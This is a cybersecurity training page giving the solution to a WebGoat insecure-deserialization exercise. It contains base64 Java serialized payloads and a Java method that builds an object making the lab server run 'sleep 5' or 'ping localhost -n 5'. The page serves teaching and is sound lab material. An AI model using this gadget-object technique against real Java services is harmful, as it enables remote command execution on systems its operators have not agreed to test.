Cycubix LTD
Search…
Welcome to Cycubix Docs
Our Cybersecurity Training Courses
Web Application Security Essentials
Introduction
WebGoat | Web Application Security Essentials | Cycubix Docs
OWASP ZAP | Web Application Security Essentials | Cycubix Docs
Solutions
HTTP Basics & Proxies | Web Application Security | Cycubix Docs
A1 - Injection | SQL Injection Intro | Cycubix Docs
A1 - Injection | SQL Injection Advanced | Cycubix Docs
A1 - Injection | SQL Injection Mitigation | Cycubix Docs
A2 - Broken Authentication
A3 - Sensitive Data Exposure
A4 - XML External Entities (XXE)
A5 - Broken Access Control
A7 - Cross-Site Scripting (XSS) | Cycubix Docs
A8 - Insecure Deserialization | Cycubix Docs
Insecure Deserialization (5) | Cycubix Docs
CCSP
Domain 1: Cloud Concepts, Architecture, and Design
Domain 2: Cloud Data Security
Domain 3: Cloud Platform and Infrastructure Security
Domain 4: Cloud Application Security
Domain 5: Cloud Security Operations
Domain 6: Legal, Risk, and Compliance
CCSP Resource Materials
CCSP Mind Map | Cycubix Docs
CCSP Official Study Guide
CCSP Official Practice Tests
CCSP Online Test Bank
Secure Coding in .NET Core
Pre-requisites
SQL Injection Exercise
SQL Injection Solution
SQL Injection Cheat Sheets
CISSP
Domain 1: Security and Risk Management
Domain 2: Asset Security
Domain 3: Security Architecture and Engineering
Domain 4: Communication and Network Security
Domain 5: Identity and Access Management (IAM)
Domain 6: Security Assessment and Testing
Domain 7: Security Operations
Domain 8: Software Development Security
CISSP Official Flashcards
CISSP Exam Outline
CISSP Mind Map | Cycubix Docs
CISSP Official Study Guide
CISSP Official Practice Tests
CISSP Online Test Bank
CISSP Glossary
CSSLP
ISC2 CSSLP Official Flashcards
CSSLP Mind Map | Cycubix Docs
CSSLP Exam Outline | Cycubix Docs
Powered By GitBook
Insecure Deserialization (5) | Cycubix Docs

Let’s try

The following input box receives a serialized object (a string) and it deserializes it.
rO0ABXQAVklmIHlvdSBkZXNlcmlhbGl6ZSBtZSBkb3duLCBJIHNoYWxsIGJlY29tZSBtb3JlIHBvd2VyZnVsIHRoYW4geW91IGNhbiBwb3NzaWJseSBpbWFnaW5l
Try to change this serialized object in order to delay the page response for exactly 5 seconds.

Solution

 WebGoat probably contains the org.dummy.insecure.framework.VulnerableTaskHolder class as shown on the lesson pages. Use this to construct and serialize your attack.
 The VulnerableTaskHolder might have been updated on the server with the next version number.
 Not all actions are allowed anymore. The readObject has been changed. For serializing it does not effect the data. Follow the additional hints from the feedback on your attempts.
The solution is serializing a VulnerableTaskHolder object created with parameters suitable for the system.
For Windows it will be something that keeps the system busy for 5 seconds, many people seem to choose to ping localhost: "ping localhost -n 5" will do nicely. For Linux, a "sleep 5" gets the job done.
Windows payload:
rO0ABXNyADFvcmcuZHVtbXkuaW5zZWN1cmUuZnJhbWV3b3JrLlZ1bG5lcmFibGVUYXNrSG9sZGVyAAAAAAAAAAICAANMABZyZXF1ZXN0ZWRFeGVjdXRpb25UaW1ldAAZTGphdmEvdGltZS9Mb2NhbERhdGVUaW1lO0wACnRhc2tBY3Rpb250ABJMamF2YS9sYW5nL1N0cmluZztMAAh0YXNrTmFtZXEAfgACeHBzcgANamF2YS50aW1lLlNlcpVdhLobIkiyDAAAeHB3DgUAAAfjDAoXFDULkHQseHQAE3BpbmcgbG9jYWxob3N0IC1uIDV0AA5jcnVtcGV0c3dhaXRlcg==
Linux payload:
rO0ABXNyADFvcmcuZHVtbXkuaW5zZWN1cmUuZnJhbWV3b3JrLlZ1bG5lcmFibGVUYXNrSG9sZGVyAAAAAAAAAAICAANMABZyZXF1ZXN0ZWRFeGVjdXRpb25UaW1ldAAZTGphdmEvdGltZS9Mb2NhbERhdGVUaW1lO0wACnRhc2tBY3Rpb250ABJMamF2YS9sYW5nL1N0cmluZztMAAh0YXNrTmFtZXEAfgACeHBzcgANamF2YS50aW1lLlNlcpVdhLobIkiyDAAAeHB3DgUAAAfjDAsAATgb5CBEeHQAB3NsZWVwIDV0AA5jcnVtcGV0c3dhaXRlcg
Code to generate payload; you can run this method as a test.
public void createPayload() throws Exception {
VulnerableTaskHolder o = new VulnerableTaskHolder("namenotimportant", "sleep 5");
ByteArrayOutputStream baos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(baos);
oos.writeObject(o);
oos.close();
System.out.println(Base64.getEncoder().encodeToString(baos.toByteArray()));
}
Please note that this was only verified on a Windows machine and the Linux payload has been generated blindly.
Previous
A8 - Insecure Deserialization | Cycubix Docs
Next - CCSP
Domain 1: Cloud Concepts, Architecture, and Design
Last modified 1yr ago
Copy link
Outline
Solution